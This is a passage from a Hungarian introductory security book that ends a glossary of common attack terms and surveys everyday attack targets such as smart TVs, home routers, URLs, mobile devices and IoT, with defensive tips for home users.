Olyan reklám e-mailek, melyek önmagukban többnyire nem képesek kárt okozni, viszont rendkívül idegesítőek tudnak len­ ni. Az e-mail kampányok szoftveresen is támogatottak és egy­ szerre akár milliós nagyságrendben is ki szoktak küldeni ilyen tartalmú leveleket. A feketepiacon a tematikus e-mail listák so­ kat érhetnek, mivel azoknál potenciálisan nagyobb az esélye annak, hogy címzettek közül valakit érdekel is a SPAM levél tartalma és akár vásárol is a reklámozott termékből. A spam kampányok megbízói általában nem létező, vagy silány minősé­ gű termékeket próbálnak értékesíteni. A kéretlen levelek nem mindig választhatóak szét a kifejezetten rosszindulatú szándék­ tól, így spam kiküldése történhet adathalász kísérlet részeként is. Kéretlen reklámprogramok („adware")

Ezek az alkalmazások valamilyen reklámot jelenítenek meg. Alapvetően közvetlen kárt nem okoznak, viszont automatiku­ san elindulnak, erőforrásokat foglalnak le és jelenlétükkel zavaró tevékenységet végeznek. Eltávolításuk rendkívül nehéz lehet. Kód visszafejtés ("reverse engineering")

Olyan eljárás, melynek segítségével visszaállítható, vagy visszakövetkeztethető egy alkalmazás forráskódja. Amennyi­ ben ez sikerül, az alkalmazás teljes működése nyitott könyvvé válik a támadó számára.

Kezdő hackerek kézikönyve

36

Könyvtárbejárás ("directory traversal")

Általában webhelyek ellen végrehajtott támadás, melynek célja a weboldalt üzemeltető gép mappa- és fájlstruktúrájának feltárása és adatok jogosulatlan letöltése, megtekintése. Közbeékelődéses támadás („man-in-the-middle attack")

Kommunikációt eltérítő támadás, melynek során a támadó a kommunkációban résztvevő felekkel (például egy otthon inter­ netező személy és a bankja) elhiteti, hogy mindketten a másik­ kal vannak kapcsolatban. Valójában azonban a kommunikáció mindkét esetben a támadóhoz fut be és onnan megy tovább. Különféle jelszavak, azonosítók ellopásának kedvelt módja, mi­ vel az erős autentikációs módszereket és eszközöket egyszerűen megkerüli. Köztes oldalon keresztül történő szkripthívás („Corss-site scripting, XSS")

Az ún. kódinjektálás egy formája. Weboldalak biztonsági hi­ ányosságait kihasználva hajtják végre, különböző szkriptek le­ futásának kikényszerítésére. Kriptográfia („cryptography")

Önálló tudományág, mely kódolással, azaz adatok biztonsá­ gi célból más adatokká történő átalakításával és visszafejtésével foglalkozik. Kriptovírus („crypto vírus")

Napjaink egyik divatos vírus típusa, mely adathordozókat titkosít. Itt átfedés van a zsarolóprogramokkal (lásd lentebb). Lábnyomkészítés ("footprinting")

Lásd ujjlenyomatkészítést lentebb. MAC cím hamisítás („MAC spoofing")

Olyan eljárás, melynek során egy hálózatra kötött eszköz fi­ zikai címét (MAC cím) másnak tüntetik fel, mint ami valójában. Ily módon például ki lehet kerülni a MAC cím alapú szűrése­ ket.

Informatikai támadások madártávlatból

37

Meglesés („shoulder surfing")

Olyan klasszikus módszer, melynek során a támadó vizuáli­ san kifigyel olyan tevékenységet, amivel illetéktelen hozzáfé­ réshez juthat. Például jelszavak, kódok begépelésekor követ­ kezhet ez be. Nem annyira „divatos" módszer, de higgyük el, a mai napig használatos! Mézesbödön ("honeypot")

Olyan preparált weboldal, melyet szándékosan támadhatóvá tesznek. Ezzel odacsalogatják a támadókat és így információkat gyűjthetnek róluk. Munkamenet ellopása, eltérítése ("session hijacking")

A munkamenet azonosítók (session ID) illetéktelen megszer­ zésével ill. újrafelhasználásával egy támadó a támadott weblap tekintetében felveheti egy másik személy azonosságát és a ne­ vében járhat el. Ezt a támadási módot a gyakorlatban több más technikával együtt alkalmazzák: lehallgatás, sütik elemzése stb. Nulladik napi sebezhetőség („zero day vulnerability")

Olyan szoftveres biztonsági hiányosság, mely már ismert, de javítás még nem áll rendelkezésre ellene. Egyes internetes olda­ lak rendszeresen ilyen információkat tesznek közzé. Sok számí­ tógépes bűnöző figyel és gyűjt üyen adatokat. Egyetlen hátrá­ nya a dolognak, hogy előbb, vagy utóbb egy szoftveres javítás befoltozhatja a biztonsági rést, ezért gyorsan (a nulladik napon, innen a kifejezés) „érdemes" kihasználni. A számítógépek szoftvereiről, például az operációs rendszerről is megállapítha­ tó, hogy pontosan milyen verziójú. Ha még nem telepítettek rá frissebb javításokat, akkor az eredetileg nulladik napos sebez­ hetőségek akár évek múltán is felhasználhatóak betörésekhez. (Ezért is fontos mindig frissíteni szoftvereinket.) Nyers erő alapú támadás („brute-force attack")

Lehetőségek teljes skálájának végigpróbálgatásán alapúló, valamilyen automatizált támadás. Leggyakrabban jelszavak visszafejtését lehetővé tevő programok alkalmazzák. Hátránya,

38

Kezdő hackerek kézikönyve

hogy adott esetben időigényes lehet, ha viszont ez rendelkezés­ re áll, akkor a siker is garantált. Rosszindulatú program ("malware")

Összefoglaló neve olyan alkalmazásoknak, melyek nem kí­ vánatos tevékenységet végeznek egy számítógépen. Sérülékenységvizsgáló eszköz („vulnerability scanner")

Olyan szoftver, melynek segítségével felderíthető hálózatra csatlakoztatott számítógépek sebezhetősége. A hackerek leg­ gyakrabban portok szkennelésére alkalmas eszközöket hasz­ nálnak, nyitott, azaz hozzáférhető portokat keresve. (Egy port nem más, mint egy szám, amit logikai kommunikációs csator­ naként használhatnak szoftverek.) SQL befecskendezés („SQL injection")

A kód-befecskendezés egyik legközismertebb formája, mely­ nek során egy weboldallal olyan szöveges adatot dolgoztatunk fel, mely valójában SQL parancsokat tartalmaz, vagy egy SQL lekérdezést módosít nem kívánatos módon. Abban az esetben kivitelezhető, ha a weboldal nem ellenőrzi elég alaposan a fel­ használó által megadott adatokat. Sütimérgezés ("cookie poisoning")

A támadási technika során egy weboldal által használt süti tartalmát módosítják olyan módon, hogy a támadó gépén a weblap ismételt lekérésére a szerver a támadó érdekeinek meg­ felelő választ adjon. A módszer a munkamenet ellopásával ro­ konítható. Szivárvány tábla („rainbow table")

Jelszavak hash-jeit tároló táblázat, melyeket előre számoltak ki és jelszavak visszafejtéséhez használhatnak. Szolgáltatás megtagadásos támadás („Denial Of Service", „DOS")

Az ilyen típusú támadásokat nevezhetjük túlterheléses tá­ madásoknak is. Több, hálózatba kötött számítógépen keresztül

Informatikai támadások madártávlatból

39

egy-egy weboldalt, vagy szolgáltatást hívnak fel nagy mennyi­ ségben, mely így a weblapokat üzemeltető szerverek túlterhelé­ séhez vezethet. Túlterhelés alatt itt azt értjük, hogy a kiszolgáló gépek már nem képesek több kérést feldolgozni és a kommuni­ káció lelassul, vagy akár teljesen bedugul. A folyamat végén a szerverek, szolgáltatások teljesen elérhetetlenek lehetnek, a tá­ madás célja is ez. Abban az esetben, ha gépek hálózata indít DOS támadást, el­ osztott szolgáltatás megtagadásos támadásról beszélhetünk (angolul "Distributed DOS", vagy "DDOS"). Trójai programok („trojan")

Ezek az alkalmazások látszólag valamilyen műveletet végez­ nek, például játékprogramoknak tűnnek, miközben hátsó kaput nyitnak a számítógépen, vagy egyéb kártékony tevékenységet kezdeményeznek. Ujjienyomatkészítés ("fingerprinting")

Többnyire szerverek jellemzőinek összességét nevezik ujjle­ nyomatnak (esetleg lábnyomnak), melyet támadások előkészí­ téséhez használnak fel. Az ehhez kapcsolódó információgyűj­ tést pedig ujjlenyomatkészítésnek. Vadon ("wild")

A vadon alatt a tágabb értelemben vett online világot értik. Például, ha azt mondják, hogy egy fertőzött alkalmazás kikerül a vadonba, akkor az alatt azt értik, hogy az interneten bárki számára hozzáférhető és terjed. Vírus („vírus")

Olyan alkalmazás, vagy kódrész, mely a felhasználó szándé­ kától eltérően módosítja a számítógép működését, adatokat vál­ toztat meg, vagy tesz elérhetetlenné. A vírusok általában más programok kódjába íródnak bele, azokhoz kapcsolódnak hozzá. Innen kapták nevüket is, mivel ez nagyon hasonlít a természet­ ben előforduló, biológiai vírusok viselkedéséhez.

40

Kezdő hackerek kézikönyve

Visszafejtés („reverese engineering")

Kódolt adatok visszaalakítása eredeti formájukba. Az adatok lehetnek jelszavak, üzenetek, de akár számítógépes programok kódjai is. Zombihálózat („botnet")

A zombihálózat olyan számítógépek összessége, melyeken egy szoftver működik és a felhasználók tudta nélkül valamilyen összehangolt tevékenységet végeztet a számítógépekkel. Ennek egyik igen látványos példája különféle támadások kivitelezése ún. botnet hálózattal. Felderítettek már 1,5 millió számítógépből álló hálózatot is. Zsaroló programok („ransomware")

Olyan alkalmazások, melyek képesek a számítógép egy ré­ sze, vagy egésze felett átvenni az irányítást, amit többnyire va­ lamilyen váltságdíj megfizetése ellenében hajlandóak feloldani. Tipikus esete, amikor egy ilyen program egy számítógép, vagy teljes hálózat meghajtóit titkosítja és egy pénzösszeg kifizetését követeli. Ilyen esetekben a pénz átutalása szinte soha nem jár eredménnyel.

Támadható célpontok a mindennapokban

41

3. Támadható célpontok A MINDENNAPOKBAN A későbbi fejezetek előkészítéseként rövid területekre és el­ lenük indítható támadásokra hívjuk fel a figyelmet. Ezeket könnyű megérteni és az itt leírt információk a későbbiekben jó ugródeszkaként szolgálhatnak a komplexebb témák megértésé­ hez. Olyan területekről ejtünk most szót, melyek körülvesznek bennünket a mindennapjainkban és valamilyen módon érintet­ tek az információs biztonság kérdésében.

A könyv szerzője személy szerint már irtózik az „okos" kifejezésektől, mert túlsá­ gosan elterjedten, ok nélkül vannak haszná­ latban a mindenféle „okos" előtagú kifeje­ zések. Annak ellenére van ez így, hogy többnyire egyszerű digitális eszközökről van szó és az „okosság" valójában ugyan­ olyan digitális technológiákat takar, melye­ ket korábban egyszerűen digitálisnak ne­ veztünk. De ez részletkérdés és nem változ­ tat azon a tényen, hogy körül vagyunk véve rengeteg ilyen „okos" eszközzel.

42

Kezdő hackerek kézikönyve

Az ún. "okos" eszközök közös ismertetőjegye, hogy elérhető­ ek az internetről is. Otthonunk minél több része vezérelhető internetről, a későbbiekben annál nagyobb figyelmet kell majd fordítanunk otthonaink informatikai védelmére. Tesztkörülmé­ nyek között már sikeresen törtek be otthoni számítógépekbe „okos villanykörtéken", ill. „okos hűtőszekrényeken" keresztül. Ezek az eszközök képesek kapcsolódni az internetre ugyan­ azon az otthoni hálózaton keresztül, mint számítógépünk.

3.1.

Okos tévék

Az okos izzók és hűtőszekrények talán még nem terjedtek el hazánkban, smart TV rendszerekkel viszont már gyakran talál­ kozhatunk. Ezek a készülékek valójában egyszerűsített, nagy integráltsági fokú számítógépek. Ez egyrészt abból is fakad, hogy a nagyfelbontású tartalmak (gondoljunk a 4K tévékre!) kezelése komoly hardvert igényel és ezt viszonylag egyszerűen meg lehet oldani hagyományos számítástechnikai megközelí­ téssel is. Az így létrejövő kapacitás pedig már elegendő arra, hogy a televízió más szoftvereket is futtasson. A mobileszközök világához hasonlóan az Android itt is je­ lentős arányban jelen van. Ezek a televíziók képesek internetes tartalmak kezelésére és vezetékes, vagy vezeték nélküli hálózatokhoz is kapcsolódni tudnak. Az alapelv, miszerint a háztartások már amúgy is rendelkez­ nek internethozzáféréssel és ez plusz beruházást nem igényel, dicséretes. Biztonsági problémával akkor lehet szembesülni, ha ezen eszközök kevésbé védettek a betörésektől. És mivel alap­ vetően szoftveres kérdésről van szó, biztosak lehetünk abban, hogy kockázat is van. Amikor ilyen eszközöket támadnak, a cél elsősorban az, hogy hozzáférést szerezzenek az otthoni hálózat más eszközei­ hez, elsősorban a számítógépekhez. Tehát nem csak egy ha­ gyományos számítógépen keresztül történhet behatolás. Ez egy viszonylag új terület, de egyre nagyobb kockázatot fog jelenteni a jövőben.

Támadható célpontok a mindennapokban

43

Egy okos TV képes WIFI, Direct WIFI, Bluetooth és Miracastkapcsolat létrehozására is. Ezek mind támadható technológiák. A Direct Wifi és a Miracast talán kevésbé ismert csatlakozta­ tási formák. Előző lehetővé teszi, hogy két eszköz közvetlenül internetkapcsolat nélkül tudjon kommunikálni egymással. Utóbbi Androidos rendszereken elterjedt és lehetővé teszi mo­ bileszközök képernyőinek ún. tükrözését a televízió képernyő­ jére. Hasznos tanácsok: • A tévékészülékek internethozzáférését igyekezzünk irányítá­ sunk alatt tartani! Ha alapvetően nem szoktunk tévénkén in­ ternetezni, a hálózati hozzáférést kapcsoljuk ki! • WIFI Direct esetén a tévénkhez csatlakozni akaró eszközt engedélyezni kell, erről egy felugró ablak tájékoztat. • Korlátozzuk a Bluetooth és Miracast eszközeink körét! • Alapvetően minden csatlakoztatott eszközt ki tudunk listáztatni. Ha olyan eszközt látunk a listában, ami nem a miénk, azt tiltsuk le!

3.2.

Otthoni internetkapcsolatok típusai

Könyvünk nem tárgyalja az otthoni számítógépek és mobil­ eszközök internetkapcsolatának beállítását. Feltételezzük, hogy az olvasó tisztában van mindezekkel*. Csupán hivatkozásképpen megemlítjük, hogy Windows alatt a grafikus felhasználói felületen végezhetjük el ezt. A Vezérlő­ pult 'Hálózati és megosztási központ' ikonjára duplán rákat­ tintva érhetjük el az ezzel kapcsolatos beállításokat. »#li Hálózati és megosztási központ

Amennyiben mégsem, úgy ajánljuk az utolsó oldalon lévő ismertetőből a kívánt operációs rendszert ismertető könyvet (Pl. Windows 10 mindenkinek).

Kezdő hackerek kézikönyve

44 *jg Hálózati és megosztási központ v

« Minden ve...

Vezérlőpult - kezdőlap Adapterbeátlitások módosítása Speciális megosztási beállítások módosítása



> Hálózati és megosztási központ

v ;



& ]Keresés a vezérlőpulton

X

p

Alapvető hálózati adatok megtekintése és kapcsolatok beállítása Ismeretlen

A függő szolgáltatás vagy csoport elindítása nem sikerült. Hálózatkezelési beállítások m ódosítása...................................................... “ajgi

Új kapcsolat vagy hálózat beállítása Szélessávú, telefonos vagy virtuális magánhálózati kapcsolat illetve útválasztó vagy elérési pont beállítása. Hibaelhárítás Hálózati hibák diagnosztizálása és javítása, illetve hibaelhárítási tudnivalók elérése.

Lásd még: intern etbeáíiitások Otthoni csoport Windows tűzfal

Otthoni körülmények között alapvetően négyféleképpen lé­ tesíthetünk internetkapcsolatot: • vezetékes hálózatra csatlakozva • WIFI, azaz vezeték nélküli hálózatra kapcsolódva • modemen kapcsolódva • 3G/4G mobilinternethez csatlakozva, melyet többnyire egy USB modemen, vagy a készülékbe épített (jellemzően okostelefon) beépített SÍM kártya adapterén keresztül ér­ hetünk el, mobilhálózatra csatlakozva. Ehhez egy érvé­ nyes SÍM kártya is szükséges, melyet a szolgáltatónktól kapunk. A rossz hír, hogy mindegyik internethozzáférés sebezhető, a jó hír viszont, hogy számos védekezési módszerrel jelentősen növelhetjük internet hozzáférésünk biztonságát.

Támadható célpontok a mindennapokban

45

°c;

3.3.

Az internethozzáférés biztonsága

A legtöbb magánember otthon vezetékes internetet használ ugyan, ám ezt vezeték nélküli útvonalválasztóval, egy ún. router eszközzel osztja meg, hogy a család minden tagja könnye­ dén hozzáférhessen a világhálóhoz. A routereket gyakran a szolgáltató biztosítja az internetes szolgáltatásához. (Leegysze­ rűsítve az apró dobozkába bedugnak egy adatkábelt, ami a ve­ zetékes jelet rádiójelekké képes alakítani és fordítva.) Minden routerhez tartozik egy alapértelmezett jelszó, amit az internetes szolgáltatást aktiváló szerelő szokott közölni az előfi­ zetőkkel. Már használatba sem vettük az internetet, de máris van leg­ alább egy idegen személy, aki tudja a jelszavunkat! Brilliáns... A helyzet még rosszabb, ha a szolgáltató a router gyári jel­ szavát meghagyja, vagy minden routerhez ugyanazt az alapér­ telmezett jelszót állítja be. Ha nem hisszük, hogy ez így van, keressünk rá az interneten routerünk pontos típusára. Kapásból egy halom fórumot fogunk találni, ahol az alapértelmezett jel­ szavakról olvashatunk. Első dolgunk tehát az legyen, hogy személyre szabjuk a rou­ terünk biztonsági beállításait, beleértve a kezdeti jelszó megvál­ toztatását is! Hogyan tehetjük ezt meg, hiszen a router egy fizikai, hardve­ res eszköz? A routerhez illik adni egy nyomtatott kézikönyvet, amiben a beállítás mikéntje van leírva. A talán legelterjedtebb

Kezdő hackerek kézikönyve

46

CISCO routerek esetén egy IP címet kell beírnunk egy böngé­ szőbe, ahol egy kvázi webes felületen módosíthatjuk a router beállításait. Miket változtassunk meg: • Jelszó: legalább 8, de inkább 14, vagy több karakterből áll­ jon, semmilyen személyes vonatkozású adatot ne tartal­ mazzon, ne tartalmazzon továbbá értelmes szóból álló részt, tartalmazzon kis- és nagybetűket, számokat és lehe­ tőleg speciális karaktert is! • A router által előállított vezeték nélküli adatforgalmat mindenképpen titkosítsuk! Ennek több fokozata is elérhe­ tő, a legbiztonságosabb e tekintetben a WPA2. • Tűzfal: a tűzfalat egy olyan logikai szűrőként képzelhetjük el, ami eldönti, hogy mely hozzáféréseket engedélyezzen internetünkhöz. Itt a legerősebb biztonsági szint - otthoni felhasználásról beszélünk - kihathat más szolgáltatásokra is. Például IP TV szolgáltatás esetén nagyon erős tűzfal szűrés esetén ugyan nő a biztonság is, ám lehet, hogy a te­ levíziós szolgáltatás nem lesz elérhető. Ilyenkor egy foko­ zattal csökkenthetjük a beállítás erősségét. Egyet ne te­ gyünk: ne hagyjuk kikapcsolva a tűzfalat! • Lehetőleg kapcsoljuk ki a WPS funkciót, mert jelszavak ki­ találását teszi lehetővé támadó szoftverek számára. A jelszó változtatásakor legyünk nagyon körültekintőek: ha a jelszót töröljük és nem csak megváltoztatjuk, onnantól kezdve bárki (egy utcán sétáló idegen is) azonnal használhatja internet előfizetésünket. A routerek beállításairól a 8. fejezetben még szó lesz.

3.4.

Böngésző bővítmények

Számos böngésző támogatja kiegészítők ("add on"), beépülő modulok ("plugin") használatát. Ezek rengeteg hétköznapi fel­ adat elvégzését megkönnyíthetik, vagy csak egyszerűen szóra-

Támadható célpontok a mindennapokban

47

koztatóbbá teszik életünket. Ilyenek például a közösségi (Facebook, stb.) aktivitásokat támogató modulok. Legyünk tisztában azzal, hogy ezek sok esetben képesek ada­ tainkhoz hozzáférni. Találkozhatunk olyan felhasználói értéke­ lésekkel, melyek kártékony kód jelenlétéről panaszkodnak. Ezeket érdemes komolyan venni. Jó ötlet, ha utánanézünk a fejlesztő személyének is, hogy mennyire tekinthető megbízhatónak stb.

3.5.

Figyeljünk oda az URL-ekre!

Könnyen kivitelezhető támadás az URL-ek megpiszkálása, vagyis oly módon történő megváltoztatása, hogy látszólag egy megbízható webhelyre mutatnak, valójában azonban pontosan az ellenkezője igaz. Néhány példa, kizárólag szemléltetésre: w w w .megbizhatooldal.com

egy teljesen megbízható oldal. A w w w .megbizhatooldal.xy.com

viszont valójában a www.xy.com weboldal (csak mi találtuk ki, szemléltető példa) egyik aloldala, aminek semmi köze a megbihatooldal.com-hoz. Ugyanígy a www.m egbízhatóddal.com /?page= www.rosszoldal.com

URL egy megbízható oldalon keresztül URL átirányítást hajt végre egy rosszindulatú kódot tartalmazó oldalra. De még ezt is lehet bonyolítani azzal, ha hexadecimális kó­ dokat helyeznek az URL-ekbe, amelyeket a böngészők gond nélkül feloldanak, az emberi szem számára viszont igen nehe­ zen olvashatóvá teszik az URL-eket. Jó ötlet, ha mindig figyeljük, milyen URL jelenik meg böngé­ szőnk alsó részén, amikor egy link fölé helyezzük az egérkur­ zort. Mivel azonban az így megjelenő URL is manipulálható, ez nem száz százalékos módszer.

48

Kezdő hackerek kézikönyve

A legnagyobb biztonságot az adja, ha nem kattintgatunk olyan URL-ekre, melyeket nem ismerünk. Az internetes hivatkozásokkal végrehajtható támadásokkal a 11. fejezetben foglalkozunk még.

3.6.

Az operációs rendszerek

Az operációs rendszerek sebezhetőek. Egyik-másik operációs rendszer hajlamos úgy hirdetni magát, hogy sokkal biztonságo­ sabb a többinél. Az elsősorban UNIX alapú rendszerek mellett ily módon érvelők sajnos elfelejtik, hogy a hacker és cracker közösségek is UNIX alapokon jöttek létre... Teljesen kockázatmentes operációs rendszer nincsen. (Legfel­ jebb egy kevésbé elterjedt rendszerre kevesebb vírus létezik.) Minden operációs rendszer, mely frissíthető és alkalmazások futtatására alkalmas, sebezhető. Márpedig egy operációs rend­ szer pontosan ilyen. Sajnos hazánkban is még mindig elterjedt tévhit, hogy a fel­ tört operációs rendszer helyettesíteni tudja az eredeti, jogtiszta rendszert. A különböző kalózverziók módosított szoftverek és semmilyen garancia nincsen arra, hogy nincsenek „extra" szol­ gáltatásokkal felruházva. Az ilyen feltört operációs rendszerek általában adatlopást és egyéb rosszindulatú tevékenységeket is tartalmaznak „beépített" módon. További kockázatot jelenhet, hogy egy feltört operációs rend­ szer egyáltalán nem, vagy nem megfelelően képes frissíteni magát, emiatt szintén további kiskapuk keletkezhetnek a kárté­ kony szoftverek, ill. behatolók számára. Sok hatékony informatikai támadás ún. „nulladik napos" hi­ bákra épít. Ezek olyan szoftverhibák, melyeket éppen most ta­ láltak meg és még nem készítették el hozzá a hibajavító frissí­ tést. A legfrissebb hibákról többféleképpen tudomást szerez­ hetnek rosszindulatú felhasználók. Ezen információk egy része hivatalosan is elérhető, ezeket általában biztonsággal foglalkozó szervezetek, cégek teszik közzé, a szoftver készítőit ezzel is arra sarkallva, hogy minél hamarabb kijavítsák a hibákat. Másik ré­ szük nem legális úton jut rossz kezekbe, akár pénzért is megvá­ sárolják őket.

Támadható célpontok a mindennapokban

49

Hasznos tanácsok: • Jogtiszta szoftvereket használjunk! A jogtiszta szoftverek költségei valójában alacsonyabbak azoknál a költségeknél, melyek a kalózverziók használatából erednek. • Tartsuk naprakészen a rendszert, azaz minden fontos frissí­ tést telepítsünk! • Ha nem akarunk költeni operációs rendszerre, de legális al­ ternatívát szeretnénk, használjunk egy Linux disztribúciót. Pl. az Ubuntu Linux egy jó választás lehet. Gyakori hiba, hogy feltört operációs rendszeren a felhaszná­ lók legális vírusirtó szoftvert használnak. Ez majdnem teljesen értelmetlen, mert ha az operációs rendszer maga nem megbíz­ ható, akkor azt még egy víruskereső sem tudja ellensúlyozni. Ugyanez igaz természetesen fordítva is. Vagy teljesen akarjuk a biztonságot, vagy nem. Köztes megoldás sajnos nem létezik.

3.7.

Mobileszközök

Pár szót érdemes ejteni a mobileszközökről külön is. A fenti­ ek ugyanúgy igazak ezekre az eszközökre is. Az okostelefonok és tabletek operációs rendszerei olyan fejlettségi szintet értek el napjainkra, hogy a könyvünkben tárgyalt informatikai kockáza­ tok ezen eszközök esetében is fennálnak. Elsősorban okostelefonoknál elterjedt szokás ún. „ROM"-ok használata (mely fogalom szakmailag egyébként teljesen rossz értelemben van használva). Ezek módosított operációs rendsze­ rek. Különösen Android készülékek felhasználóinál népszerű­ ek, mivel számos további funkció elérhetőségének a lehetőség­ ével kecsegtetnek. Maga az Android nyílt rendszer, így elvileg teljesen jogszerű is lehet, ha valaki egy saját rendszert tesz elér­ hetővé. A gond ott kezdődik, hogy a bizonytalan forrásból származó, például rendszergazdai jogosultságokkal kecsegtető (ún. "root”olást kínáló) Android rendszerek általában már eleve valami­ lyen rejtett megoldást alkalmaznak és semmilyen garancia nincs arra, hogy nem tartalmaznak-e rosszindulatú funkciókat.

50

Kezdő hackerek kézikönyve

A probléma iOS rendszerek esetén is létezik, amit jól jelez az is, hogy kereskedelmi biztonsági termékkel is feltörhetőek ezek az eszközök is (Elcomsoft ios forensic toolkit: ios.elcomsoft.com). Hasznos tanácsok: • Ne használjunk mobileszközökön a gyáritól eltérő, feltört rendszert! A gyártóknak még saját rendszereiket sem sike­ rül sokszor javítgatni. Egy eleve kétes eredetű rendszerrel öngólt lőhetünk. • Kerüljük a bizonytalan eredetű, egyébként olcsó' mobilesz­ közök használatát. Elsősorban a hazánkban is telephellyel rendelkező, megbízható gyártók készülékeit keressük, szaküzletekben! Az aluljárók mobilkereskedéseiben fellel­ hető, elsősorban használt eszközök "előélete" szintén bi­ zonytalannak tekinthető. • Használt mobileszközöket fenntartással kezeljük, vagy in­ kább egyáltalán ne vásároljuk meg! • Használjunk víruskereső szoftvereket mobileszközeinken is! Talán a mobileszközökön a legkönnyebb ingyenes alkalma­ zásokat beszerezni. Ez olyan alkalmazásboltok esetén, mint például a Google Play Store, nagyon vonzó. Könnyen találkozhatunk olyan szoftverekkel, melyek hozzá­ férést igényelnek névjegyeinkhez, közösségi hálózati adataink­ hoz stb. Ilyen szoftverek esetében legyünk mindig nagyon kö­ rültekintőek! Bár extrém esetekben az eszköz bármely adatához hozzáfér­ hetnek egy ilyen alkalmazáson keresztül, gyakoribbak az olyan esetek, melyek során profilunk adataihoz hozzáférve, profilunk alatt kéretlen reklámokat kezdenek megjeleníteni ezek az al­ kalmazások, amit persze aztán ismerőseink is látnak majd. A kellemetlenségen kívül ez az adott (közösségi hálózati) szolgáltatás zavarásának is minősülhet és nem kívánatos. Legrosszab esetben pedig akár költséges emeltdíjas híváso­ kat vagy sms-eket is kezdeményezhetnek a fertőzött progra­ mok.

Támadható célpontok a mindennapokban

51

Sajnos egyre jobban terjednek mo­ bileszközökön is a kriptovírusok.

Hasznos tanácsok: • Mobilalkalmazás telepítése előtt mindig tanulmányozzuk át, hogy a program mihez igényel hozzáférést működése során. A túl sok hozzáférés gyanút kell, hogy keltsen. Ilyenkor inkább mondjunk le az applikáció telepítéséről. • Olvassuk el az alkalmazásokhoz írt felhasználói értékelése­ ket is. Ha gond van egy programmal, az értékelésekből gyorsan kiderülhet. • A nem hivatalos alkalmazásboltok használatát kerüljük!

3.8.

A dolgok internete

Az IoT az „internet of things', azaz a "dolgok internete" an­ gol kifejezés rövidítése. Ide tartoznak az okosórák, okos hűtők, okos villanykörték, okos zoknik (nem vicc!) és még sorolhat­ nánk. (Csak kár hogy okos felhasználó nem jár hozzá.) Ezen eszközök egyik forradalmi tulajdonsága, hogy önma­ gukról és környezetükről is képesek adatokat előállítani és azt internet segítségével elérhetővé tenni. így például munkahe­ lyünkön ellenőrizhetjük, hány fok van otthon a lakásban, vagy hazafelé menet távolról elindíthatunk egy mosást stb. Egyre több eszközt vérteznek fel ilyen lehetőséggel. Ez ön­ magában jó dolog. Több probléma is van azonban ezzel a két­ ségkívül divatos lehetőségáradattal: • Maguk a gyártók sem tudják pontosan, hogy mit várnak ezektől az eszközöktől. Ennek egyik jele az IoT eszközök dömpingje és a szabványok hiánya. • A cél egyelőre csak az újdonság ereje és a profit, a biztonság nem elsődleges szempont. • A személyes vonatkozású információk áramlása soha nem látott mértéket ölthetnek általuk. Ennek a helyzetnek a ke­ zelése jelenleg még nincsen szabályozva.

52

3.9.

Kezdő hackerek kézikönyve

A „felhő" technológiáról

Elsősorban informatikusok előszeretettel emlegetik a „felhő" (angolul: cloud) kifejezést. Ez egy olyan technológiát takar, ami elsősorban az adatok távoli tárolására épül. Adatainkat már nem szükséges eszköze­ inken tárolni, hanem egy távoli tárhelyen is lehet. A technológia ennél többet is kínál, de a lényege ez. A mellette szóló érvek szerint az adattárolás olcsóbb és biz­ tonságosabb is, mivel egy helyen, a szolgáltató oldalán a lehető legmagasabb biztonság garantálható. A felhő technológia használata messzemenően a bizalmon alapul. Beleegyezünk abba, hogy mások kezeljék adatainkat. A kockázatok egyike az adatok véletlen, vagy szándékos fi­ zikai megsemmisülése emberi mulasztás, vagy külső behatás (pl. természeti katasztrófa) következtében. További kockázat, hogy a személyes adatokat már egy központi helyről is el lehet lopni, ily módon az adatlopás is alkalmazkodik az új trendek­ hez, ráadásul jóval nagyobb kárt is könnyebb így okozni, hiszen csak egy adattároló szolgáltatót is elég támadni. (És akkor még nem is beszéltünk az elérhetőség korlátáiról.) Összefoglalva: a felhő innovatív, hasznos dolog, de igencsak kétséges, hogy minden téren ezt lenne érdemes használni.

3.10. Virtuális valóság A vitruális valóság hogy jön ide? Nos, a virtuális valóságban is ugyanúgy döntéseket kell hoznunk, önmagunkat fejezzük ki, ezért ott is adatokat szolgáltatunk magunkról, így ezt használva is adatok keletkeznek, melyekkel vissza lehet élni.

Támadható célpontok a mindennapokban

53

Itt csak utalunk ennek a lehetséges kockázataira, mivel ez a technológia még gyerekcipőben jár, folyamatosan fejlődik és még messze nincsenek kiforrott megoldások.

3.11. Önvezető autók Az önvezető autók sorozatgyártását könyvünk írásakor 2020 körűire látják megvalósíthatónak az autógyártók. Ezek az újgenerációs járművek informatikai biztonsági szempontból elsősorban kétféle kockázatot hordoznak maguk­ ban: • A járműveket már nemcsak utazásra, hanem kommuniká­ cióra és személyes szórakoztató központként is használjuk. Amennyiben adatokat teszünk elérhetővé ilyen járművek számára, úgy a támadások potenciális új célpontjaivá vál­ hatnak. • A legkézenfekvőbb kockázat a jármű eredeti funkciójának, a közlekedésnek a megzavarhatósága. Az autó használha­ tatlanná tétele, blokkolása, eltérítése mind-mind olyan helyzetek, melyek informatikai eszközökkel a jelenlegi pro­ totípusok esetén is lehetségesek, ezért joggal feltételezhet­ jük, hogy a későbbiekben sorozatgyártásra kerülő automata gépjárművek esetén is potenciálisan felmerülnek majd.

3.12. Víruskeresők használata Számos ingyenes és fizetős víruskereső szoftver érhető el napjainkban. Ezek a szoftverek hagyományos asztali számító­ gépekre és mobileszközökre is elérhetőek. A fizetős alkalmazá­ sok általában nagyobb teljesítményűek, kevésbé terhelik operá­ ciós rendszerünket és extra szolgáltatásokat is biztosíthatnak, például távolról törölhetjük a telefonunkon tárolt személyes adatokat, ha esetleg ellopják a készüléket. A víruskeresők használata kézenfekvő és kényelmes megol­ dásnak tűnik, viszont ne feledjük, hogy az információs védelem nem itt kezdődik, éppen ellenkezőleg: a víruskeresők a védelem utolsó vonalát képezik, hiszen elsősorban arra az esetre kínál­ nak megoldást, ha a támadási kísérlet, fertőzés már folyamat­

Kezdő hackerek kézikönyve

54

bán van. Ez még akkor is igaz, ha nem csupán vírusok keresésé­ re és ártalmatlanítására használhatóak, hanem behatolás véde­ lemmel, e-mail védelemmel is rendelkeznek, sőt az internetes böngészés közben is bizonyos fokú védelmet biztosítanak. Elmondható, hogy a víruskeresők is csak a tudatos és óvatos felhasználói viselkedés mellett lehetnek hatékonyak.

3.13. Anonim internetezés 3.13.1.

Privát böngészés

